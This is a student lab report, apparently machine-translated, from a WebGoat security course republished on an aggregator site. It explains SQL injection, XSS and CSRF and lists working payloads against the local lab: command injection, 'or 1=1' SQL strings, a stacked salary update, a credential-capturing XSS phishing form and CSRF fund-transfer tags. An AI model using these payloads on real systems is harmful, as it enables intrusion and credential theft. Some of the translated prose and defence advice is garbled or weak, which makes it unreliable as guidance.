20165302 Exp9 Web security infrastructure

Others 2019-05-26 16:45:21 views: null

Purpose

The goal of this practice understand the basic principles of common network attack techniques. Under Webgoat practice related experiments

Basic questions answered

(1) SQL injection attacks principle, how to defend

  • The so-called SQL injection, is inserted through the SQL command into the Web form is submitted the query string or enter a domain name or page request, and ultimately to deceive the server to execute malicious SQL commands. Specifically, it is the use of existing applications, the (malicious) SQL command injection into the back-end database engine capacity of execution, it can enter the (malicious) SQL statements in a Web form to get on the site of a security vulnerability database, rather than to execute SQL statements in accordance with the designer intent. Submit queries character through the WEB form, these forms are particularly vulnerable to SQL injection attacks
  • Defense: The most common is to perform a keyword checking business logic layer. If you include the SQL keyword, such as *, or, select, delete, etc. keywords will be replaced; still the most effective use of SQL query variables, avoid using SQL string to splice strings.

(2) the principle of XSS attack, how to defend

  • The principle is a piece of JavaScript code injection page. Then when other users access the page, they will run the JS code written to implement some hackers Account Control

Stored XSS attack: Last reflective XSS attack can only attack certain user clicks on the link. Storage type XSS attacks might be all users. The classic is the signature panel users. This place allows the user to customize. Content will be stored in the database. When other users view him, it will be loaded from the database. If a malicious user has injected js reference in its signature box, then browse all of his control will be Js

  • Defense: Keyword determining when one keyword such as scripts, src to replace damaged; transcoded content is returned, the angle brackets transcoding Unicode-encoded format

(3) CSRF attack principle, how to defend

  • CSRF (Cross Site Request Forgery), Chinese is a cross-site request forgery. CSRF attacker after the user has logged in the destination site, an attacker convince a user to visit a page, using the user's trust in the target site, a user initiates a request forgery user actions on the target page website in the attack, to attack the purpose.

  • Defense: The solution is to add a field to the form tag. Hackers can not guess the token has changed, so even if you add a UUID token, save it to the server session, hackers can not guess the random token, we can not construct a link to achieve the function.

    Experimental Procedure

    1.webgoat installation

  • In this address to download https://github.com/WebGoat/WebGoat/releases/tag/7.0.1

  • The following directory contains the package to run in a virtual machinejava -jar webgoat-container-7.0.1-war-exec.jar

  • In the browser, enter localhost: 8080 / WebGoat below the default password, log in to start test

2.SQL injection attacks

(1) Command Injection

  • Right-click on the page, select inspect Element review page elements to modify the source code, arbitrary code column in the check box, right-click and choose Edit At Html modify, add "& netstat -an & ipconfig"
  • Click the view, you can see the network port usage and the IP address of the instruction is executed. Successful attack!

    (2) numeric injection
  • Right-click on the page, select inspect Element review page elements to modify the source code, add or 1 = 1 in the selected city in number Value Value
  • Display of weather conditions all cities

(3) Log deceive

  • Fill webgoat% 0d% 0aLogin Succeeded for username in the User Name: admin use a carriage return and line feed% 0A 0D% allowed two lines appear in the log
    after entering the password and click Login, you can see webgoat displayed in the Login Fail that line we have added the statement on the next line display
  • An attacker could exploit this way to add malicious script to a log file, the script returns information administrators can see through the browser. For example, the admin <script>alert(document.cookie)</script>user name input, you can see the cookie information popups.

(4) SQL injection

  • Click Injection Flaws- String SQL InjectionEnter Message in
    input query the user name Smith' or 1=1--using the 'advance closed "," never really insert type 1 = 1, and - comment out the contents of the back, so you can select all the data tables inside

(5) LAB: SQL Injection

  • In the box, enter a password ' or 1=1 --, the login fails, you will find a password that only part of the input that the password length is limited.

  • In the Password box, right-choice inspect Elementreview page elements to modify the length modified to try 50

(6) database back door

  • Input 101, to obtain information of the user

  • Enter the injected statement101; update employee set salary=10000

  • Successfully created back door

    XSS attacks

(1) Phishing with XSS Cross Site Scripting phishing attacks

  • Click onCross-Site Scripting (XSS) Phishing with XSS
  • Enter the code page of the search box <form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> </form><br><br><HR>, the search box can appear as follows
  • Enter the code
<script> function hack() { alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ""; } </script> <form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form><br><br><HR>
  • Enter the login user name and password input to display, the information will be entered WebGoat capture and feedback to us

(2) Stored XSS Attacks

  • In the Message constructed sentence
    after random input, the input title can be found just created posts

CSRF attacks

(1)Cross Site Request Forgery

  • Write a URL into the Message box, not visible to other users, set a hidden picture, once the user clicks it will trigger a CSRF event
  • Enter Message in<img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />
  • Click on the news, the news page will be downloaded and displayed, the user will perform turn away deposits
    (2) CSRF Prompt By-Pass
  • See page and the src-side Parameters menu of values, named title, message box enter the code:
<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>

Guess you like

Origin www.cnblogs.com/dky20165302/p/10867572.html
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com